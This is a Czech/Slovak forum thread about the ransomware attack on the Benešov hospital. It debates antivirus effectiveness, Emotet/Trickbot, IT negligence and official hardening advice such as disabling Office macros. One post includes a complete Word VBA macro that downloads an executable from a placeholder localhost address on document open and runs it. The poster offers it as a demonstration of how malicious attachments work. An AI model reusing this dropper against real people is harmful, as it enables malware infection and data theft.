Kyberútok na nemocnici v Benešově

Načo ti to je vedieť. Pozri sa na naše novinky, kde su 2 správy o phisingpvyvh útokoch... a to podstatné... väčšina veľkých antivírov ich nevedela ani pár dní po lobjavení detegovat.
OK aby som nekecal... pri policajnom phisingu zareagovali veľké firmy do 48h.

To je naprosto zásadní otázka. Protože třeba Eset poskytuje funkční Ransomware štít a kdyby něco takového používali, rozhodně by nedošlo k plošnému zašifrování souborů. Předpokládám, že tam žádná skutečná ochrana nebyla použita, případně že spoléhali na Microsoft Defender.

Ziadna 100% ochrana proti virusom neexistuje.

To jistě ne, ale je podstatný rozdíl v tom, jestli má dlouhodobou úspěšnost na úrovni třeba 50% oproti 90%. Nevím jak je to dnes, ale před pár lety, když jsem se ještě živil servisem počítačů jsem viděl spousty PC provirovaných skrz naskrz, kde vesele běžel "antivir" AVG a nic podezřelého nehlásil. Nikdy jsem neviděl takovou situaci například při použití antiviru Eset. Takže na výběru vhodné ochrany záleží a ne že ne.

AV deteguju virusy but na zaklade db alebo cez heuristiku.
Nasledujuce info su starsie, takze nemusia uz platit.
Eset napriklad na rozdiel od AVG alebo Avastu maval lepsiu db a bol tam 100% a navyse robil minimum falsonych poplachov. Pamatam si ako boli prave CZ AV diskvalifikovane z testov z dovodu vysokeho poctu falosnych poplachov. Mozno aj na zaklade toho presli do opacneho modu, kde nezahcytili to co mali, pretoze sa bali falosneho poplachu.
Druha moznost je zaujimavejsie a tou je heuristika. V casoch, ked som sledoval scenu vitazil pravidelne NOD v testoch heuristiky, co je zjednodusene prelozene detekcia neznamych virusov. A teraz pride to hlavne...Eset sice vitazil, ale jeho uspesnost bola na hranici 50%, cize zjednodusene povedane kazdy druhy virus, ktory nebol v db cez neho presiel.
Ako som pisal v aktualite...24h po tom, co Virus total zaregistroval nahlasenie virusu ho drviva vacsina velkych AV stale nemala vo svojej db a nevedeli ho detegovat. Po 48h uz poznaju takmer vsetky.
V skratke...ak mas NODa a klikol si na prilohu vcera tak si zavireny, ak uz dnes tak ti ho AV do pc nepusti.

To je bullshit toto. Žádný antivirus není dokonalý, naopak nejspolehlivější mi přijde Defender. Antivir by tě správně měl chránit před útokem zvenčí a ne analyzovat každou tvoji chybu a kontrolovat, jestli sis nestáhl virus. Měl by tě chránit, když uděláš chybu, ne když nepoužíváš mozek a nedodržuješ zásady bezpečnosti na internetu.

Blbosť, mali iba Eset spolu s americkým, kapitaľistickým Defender, keby používali Avast, sú chránení pred nákazou všetci, aj pomocný zdravotný personál.

aj pomocný zdravotný personál

I jejich děti. To nepodceňuj!

"Pozri sa na naše novinky, kde su 2 správy o phisingpvyvh útokoch... a to podstatné... väčšina veľkých antivírov ich nevedela ani pár dní po lobjavení detegovat."

Kdyby jsi pozorně četl tak jsem v té jedné phisingové aktualitě popisoval test toho malwaru a z toho testu vyplývá to, že Defender v měsíc staré verzi databáze detekuje ten soubor, ale v aktuální verzi detekuje až chování makra. To samé platí i pro makro, které jsem uvedl před chvílí níže. Takže to, že nějaký antivir na virustotal nedetekuje soubor ještě neznamená, že nedetekuje samotnou hrozbu, která v tom souboru je, může detekovat až samotné chování, protože například ty makra se dělají tak, aby nešlo poznat co ty makra dělají, a je lepší až detekovat třeba to, když se to pokoušejí dělat (například stažení/uložení + spuštění souboru).

https://pc.poradna.net/questions/1688575-prisel-mi-emajl-nevim-co-si-o-nem-myslet

Zajímal bych se, co předtím dělali jejich ajťáci (jestli tam vůbec nějaké mají nebo jestli v rámci úspor tam to oddělení ani nemají) a jestli všichni co mají přístup do nemocniční sítě byli prokazatelně proškoleni co mohou, nesmí, co jim hrozí, podepsali, že tomu rozumějí a občas byli kontrolovaní, jestli to taky dodržují. A pokud bych zjistli nějaké opominutí, tak bych to ajťákům nechal sežrat.

Teď je blbá doba, že hodně lidí touží být ajťáky a chodit si pro výplatu s nůší.
https://www.zive.cz/poradna/pomoc-studentce-v-it-co-je-vazne-zoufala/sc-20-cq-607352/default.aspx?consultanswers=1
Ale je otázka, kdo na to má.

A taky mi chodí emajly skoro i když si koupím tři rohlíky a deset deka vlašáku, abych kliknul na přílohu a vyplnil dotazník, jak jsem byl s koupí spokojený (samozřejmě to nedělám a pokud to není Noreply, tak jim napíšu proč to dělat nebudu a co si o nich myslím).
Dokonce ni nedávno přišel takový emajl jménem České Spořitelny, u takové instituce bych předpokládal, že IQ jejich ajťáků je vyšší než dnešní datum.

u takové instituce bych předpokládal, že IQ jejich ajťáků je vyšší než dnešní datum

U takové 'instituce' o zasílání těchto věcí ajťáci určitě nerozhodují.
Management se jenom nechal oblbnout jejich aktivitami a 'trendem'.

Základní chyba u nich je/byla, že byla internetová síť propojená s tou vnitřní tak, že se zvenčí dalo dostat k datům nemocnice a pacientů. Ti ajťáci (nebo jiné odpovědné osoby) tam už doufám nepracují. A měli by se podílet na odškodnění napáchaných škod.

Tady jsem se rozepsal i o Benešově:
https://pc.poradna.net/flashes/2968838-phishingovych-utoku-pomoci-mailu-pribyva#r2969211
I ta diskuze pod tím má docela informační hodnotu

Neco najdes i tady (v diskuzi):

https://pc.poradna.net/flashes/2963869-benesovskou-nemocnici-ochromil-pocitacovy-virus-pacienty-z-jip-prevezli-jinam

Normálny človek nepoužíva antivirus a nechytí ani vírus...

Správně, normálný člověk zkouší každý den novou verzi Linuxu, takže výrobci virů se nestačí adaptovat a tlačí stejný styl každému, bez ohledu na to, že z pracovního PC budou mít jenom hračku na zabití volného čaSU, jelikož jím na něm nepoběží jejích pracovní programy.

https://www.hospital-bn.cz/novinky/napadeni-nemocnice-rudolfa-a-stefanie-benesov-krok-po-kroku/
"Nemocnice měla nasazené prvky softwarové ochrany jako je firewall a antivirová ochrana (ESET a Defender)."
Dyť to mají na webu ofiko napsané.
Mimochodem kdyby plně využili "nástroje integrované ve Windows" tak by se jim nestalo to, co se jim stalo, asi o možnostech Windows nic nevíš pokud píšeš "krapet dětinsky spoléhali".
... a jdu pokračovat.
Hejtmanka Jaroslava Pokorná Jermanová, citace z mnou uvedeného odkazu:
"Ještě jdou zdůrazňuji, že nemocnice měla bezpečnostní opatření nastavena jako všechny ostatní nemocnice, včetně fakultních."
Citace z odkazu z prvního postu:
"LN To se opravdu stalo jedním kliknutím na přílohu?
Bohužel ano. Takto je tento virus postavený. Je to takový vojenský průzkumník, který se dostane přes skript do všech ostatních počítačů, serverů a zařízení v síti."
"LN Jak pak útok pokračoval?
Virus si z cloudu stáhl druhého pomocníka, který se jmenuje Trickbot. Má za úkol mapovat veškerá hesla. Dostane se až k privilegovaným účtům administrátorů. ..."
Aha, takže kybernetická bezpečnost nemocnic je nastavena tak, že pokud kdokoliv klikne na přílohu, malware napadne celou nemocnici a malware klidně může přijímat a odesílat cokoliv přes internet (to měli ještě štěstí, že je napadl emotet a verze, která neodesílá data domů). tedy spíš :_-(
Co se týče třeba těch hesel, trickbot se k nim dostane třeba pomocí mimikatze, což je open source nástroj:
https://www.cisecurity.org/white-papers/security-primer-trickbot/
https://github.com/gentilkiwi/mimikatz
a bez toho, aby někde nebylo něco uděláno blbě v kybernetické bezpečnosti, se prostě k těm heslům dostat nedá.
Pak tu máme filtrování v mail serveru, nastavení office, nastavení klientského pc, přístup k admin účtům, na servery...
Jako jsem laik, ale podle mě tam muselo být tolik chyb v kybernetické bezpečnosti, že je mi z toho až smutno.
Fakt se bojím jít do jakékoliv nemocnice!

"Nemocnice měla nasazené prvky softwarové ochrany jako je firewall a antivirová ochrana (ESET a Defender)."
Já si doteď myslel, že kombinovat více systémů antivirové ochrany je zásadní chybou, že zde rozhodně neplatí pravidlo "čím víc pruhů, tím víc Adidas".
Ale ještě lepší věc je uvedená úplně na konci:
"Infiltrace virem: není známo, mohlo to být klidně v řádu měsíců před útokem, probíhá analýza NUKIB"
Takže tím chtějí říci, že měli možná několik měsíců zavirovanou síť a nikdo si toho nevšiml?
Podle mne tam někdo něco těžce zanedbal a teď se to snaží ututlat.
A taky bych si rád někde přečetl nějaké vyjádření společnosti Eset, která se chlubí desítkami ocenění a fakt, že jejich systém údajně nezabránil tomuto incidentu může řada stávajících i potenciálních klientů chápat jako velký problém.

...Podle mne tam někdo něco těžce zanedbal a teď se to snaží ututlat....

Já bych k tomuto řekl toto:

"Předpokládáme revizi stávajících analýz, využití validních a aktuálních dat a pochopitelně i realizaci šetření v oblastech a tématech, které dosud monitorovány nebyly, a přesto jsou pro zabezpečení efektivního proinkluzivního prostředí nezbytné."

se obávám, že mezinárodní hackerské skupiny existovaly jen na počátku století.
od té doby, co se z útoků na pc/sítě stal buďvýnosný kšeft nebo služba vlasti, už jde hlavně o národní skupiny z tradičních kriminálních zemí.

Uvedeno je nemocnice, nikde není uvedeno, že ta kombinace byla v jendom OS.
Co se týče té doby, já bych to tipoval na max. pár dní podle časů, které jsou uvedeny na núkyb jako doby kompromitace u varování před emotetem. Co se týče té doby, mně přijde spíš zarážející, že je vlastně připuštěna teoretická možnost, že by klidně v nemocnici mohl být malware, který si může dělat co chce a to několik měsíců a může být třeba detekovám až v případě, že začne šifrovat data, což je logicky nápadné jednak že to vytěžuje cpu a jednak že nebude přístup k datům, pokud k nim malware nevytvoří přístup. Jenže to už může být jen třešnička na dortu, pokud je malware schopný stáhnout další malware (například emotet stáhne trickbot z internetu a tedy komunikuje ven (dotaz) a dovnitř)) a tedy komunikovat s internetem navíc nepozorovaně a následně malware získá přístup k admin účtům, tak mi z toho logicky vyplývá, že klidně můžou uniknout citlivá data a jestli je to běžný stav nemocnic, tak kdo ví, v kolika z nich teď utíkají citlivá data... Nebo, nedej Bože, mění...

jéžiš, ty jsi teda teoretik...

Ten příspěvek teoretický byl. Ale jinak, pokud to jde a v rámci možností, jsem i praktik Např. zkoušel někdo ten doc od Jan Fiala? Já jo. Nebo emoteta? Nebo si udělal někdo svůj demo malware, který se šíří pomocí doc přílohy v mailu?
Tu máš příklad makra do wordu:

Private Sub Document_Open()
    Dim e As Object
    Set e = CreateObject("Microsoft.XMLHTTP")
    e.Open "GET", "http://localhost/m.exe", False
    e.send
    If e.Status = 200 Then
        Set o = CreateObject("ADODB.Stream")
        o.Open
        o.Type = 1
        o.Write e.responseBody
        o.SaveToFile Environ("Temp") & "\m.exe", 2
        o.Close
    End If
    Dim RunM
    RunM = Shell(Environ("Temp") & "\m.exe")
End Sub 

A pak už je to jen o tom tuto funkcionalitu udělat tak, aby ji nezachycoval třeba antivir. Pod m.exe pak může být co chce. A sleduje někdo chování zabezpečení? Já jo. A třeba ransomware (rsa+aes) jsem teoreticky schopen vytvořit taky a i další prvky malwaru, ale to už raději dělat ani nebudu.
Navíc i teoretické znalosti bohatě stačí na to, aby člověk mohl relevantně reagovat Kdo tu ve vlákně zodpověděl otázku tazatele? Já

Tvá praxe je ovšem z druhé strany a navíc tak trošku lamerská. Nic proti, ale tímhle nikoho neohromíš.

Já nikoho ohromit nechci
Píšu své názory a píšu to co vím, píšu to jako domácí uživatel, který se o to zajímá. Nepracuju v it a nemám it vzdělání, ale myslím, že mé znalosti it jako laika jsou docela dobré minimálně na to, abych se k určitým věcem mohl vyjadřovat a napsat svůj názor.
Například toto makro jsem tu napsal proto, aby si klidně mohl kdokoliv vyzkoušet na jakém principu to (doc příloha v mailu a automatické spuštění například exe přes makro) funguje. A myslím, že tu chodí normální lidi, kterým se to může hodit, například mně by se to včera hodilo, protože s makry jsem dělal prvně, takže abych to sesmolil, dalo mi to docela zabrat (nejdřív jsem i stahování chtěl dělat přes shell a curl (součást W10), jenže to mi nečekalo, pak jsem nějak řešil sleep nebo wait, to mi nějak nešlo, takže jsem to udělal přes CreateObject a XMLHTTP, ten čeká než se provede).
A jestli to z druhé strany myslíš z pohledu malware, tak jsem ti tu už psal myslím několikrát (jak jsme to řešili v prosinci), že ten pohled ti jaksi chybí a bez toho, abys ten pohled měl, jaksi nemůžeš řešit kybernetickou bezpečnost.
To, že neohromuju já, je logické. Zdá se mi ale, že neohromuješ ani ty a jestli děláš v it, to bys asi ohromovat měl...

Jasně, není problém se vyjadřovat na téma např. operace akutního zánětu slepého střeva, i když nikdo z nás není doktor. Ale takový "názor" je z logiky věci poměrně bezcenný.

Samozřejmě můžeš napsat stovky různých variant jak stáhnout a spustit kód z internetu, klidně např. pomocí samotného systému (BITS), ale to nikterak neřeší problém velkých organizací, ve kterých pracují vysoká procenta nevzdělaných nebo vystresovaných a přepracovaných lidí, kteří nebudou při klikání přemýšlet. Ty to vidíš z pohledu technokrata, který si nepřipouští fakt, že lidi chybují a při repetitivní práci nepřemýšlí. A to je ta největší chyba, jakou děláš.

Ten zbytek tvého slohového cvičení jen ukazuje, že o reálné praxi víš prd.

1) V prosinci odvolaný ředitel NÚKIB: ne IT vzdělání, manažerské pozice. Podle tebe jeho názor co se týče kybernetické bezpečnosti byl, je a bude bezcenný, ano? Mimochodem jsem chodil na stejnou fakultu jako on.

2) Co řeší problém jsem tu už psal. Snažil jsem se ti jej vysvětlit několik dní, nepochopil jsi a snažit se ho chápat ani nechceš. To chceš abych v tom opět zbytečně pokračoval??? Takže další pokus:
a) Jací jsou koncoví uživatelé vím a názor na ně jsem ti už psal. Proč mi tedy ohledně nich píšeš co mi píšeš??? Já vím, že co se týče kybernetické bezpečnosti chybují a chybovat budou.
b) Určitá firma/organizace vyžaduje určitý stupeň kybernetické bezpečnosti v závislosti na druhu určení. V případě nemocnice musí být kybernetická bezpečnost na relativně vysoké úrovni.
c) O to, aby byla zajištěna kybernetická bezpečnost, se stará kompetentní IT oddělení.
d) Aby byla zajištěna odpovídající kybernetická bezpečnost nemocnice musí být aplikována určitá controls/doporučení. Budu citovat například dvě doporučení uvedená v
http://www.mzcr.cz/dokumenty/pokyn-ministerstva-zdravotnictvi-ve-veci-kyberneticke-hrozby_18235_1.html
která by podle mě aplikovaná určitě být měla:
"Zakažte makro skripty ze souborů sady Office přenášených e-mailem." Psal jsem ti i další možnost a to povolit jen podepsaná makra.
"Implementujte zásady softwarového omezení (Group Policy) nebo jiné ovládací prvky" Takže SRP, AppLocker. Ani whitelisting by nemusel být problém...
Kdyby to nebylo v silách nemocnic to aplikovat asi by to v doporučeních ministerstva zdravotnictví nebylo.
V doporučeních pro administrátory od núkib jsou tyto dvě doporučení uvedena pod "Ověřujte identitu aplikací a souborů" a "hardening konfigurace uživatelských aplikací".
A to jsou jen dvě z mnoha překážek, které by měly být pro malware. Co by se stalo teď? Koncoví uživatel klikne na přílohu s malwarem a příloha se mu zobrazí bez makra (protože je makro zakázané nebo povolené jen podepsané) a nestane se vůbec nic. Co když se bude chtít spustit skript, exe, dll...? Nestane se vůbec nic, protože je vhodně nastavené filtrování aplikací.

3) Obecně od it technika mimo jiné očekávám it vědomosti, zájem o problematiku, zájem o kybernetickou bezpečnost, zájem o problematiku malwaru, přístup ve stylu "není problém"... podobně jako to cítím třeba v případě Martin Hallera (patron-it) doporučuju jeho články a videa, moc zajímavé. Co se týče kybernetické bezpečnosti tak informací na netu je spousta. I to jak řešit kybernetickou bezpečnost firem/organizací.

Nechci vas tu rozsuzovat, nakonec kdo jsem, abych mohl, ale bod 1) Ano, ten clovek prokazal, ze konkretne jeho nazor je zcela bezcenny. Mozna se politikum hodil, ale to je tak vsechno.

Nikdy jsem neviděl takovou situaci například při použití antiviru Eset.

tys to neviděl hodně.
až na módní ransomware jsou viry dávno out. antiviry jsou poněkud slabé proti spyware, a samozřejmě nedetekují nové varianty snadno modifikovatelných skriptů.
spoléhat na zabezpečení antivirem je silně naivní.

čili ten nový skript si tam ta skupina propašuje a dokud se neprojeví a není důvod po něm jít, může se jím sestavený proces/služba bavit čím uzná za vhodné, av firmy o něm stále neví.
když se mu daří komunikovat s internetem a může si stahovat další součásti, tehdy chystá v síti "den d" (obvykle úmyslně "noc víkend"). sbírá si informace o verzi os a možnostech k napadení. když se k jejich stažení nedostane, prostě se další level neprojeví, nanejvýš je občas v síti detekován některý z jeho klonů.

doporučuju zůstat u servisu domácích pécéček, toto vypadá že není tvůj hlavní obor.

To by mě taky zajímalo...co používali, verze OS, antivirů, jaké prostředí... pouze Win/Lin/Mac...atd...oddělené sítě... Ale to by musel vynést někdo z IT. Rád bych se poučil.

Senátor Fischer to už vyřešil. Udělali to Rusové a řešení je víc peněz pro NÚKIB.

Takže když je něco napadeno virem, který vznikl v rusku, udělali to Rusové. Co tedy s těmi nástroji, které unikly Američanům a které se hojně využívají? Pak za čímkoliv, co použije nějaký nastroj mohou Američani. To je logika hodná Fishera.
Za odvolání Cizkovskeho taky může Rusko, veřejně to přece prohlásil vrchní člen námořního komanda.

Senátor není nejostřejší tužka v penálu, ale politicky mu to myslí.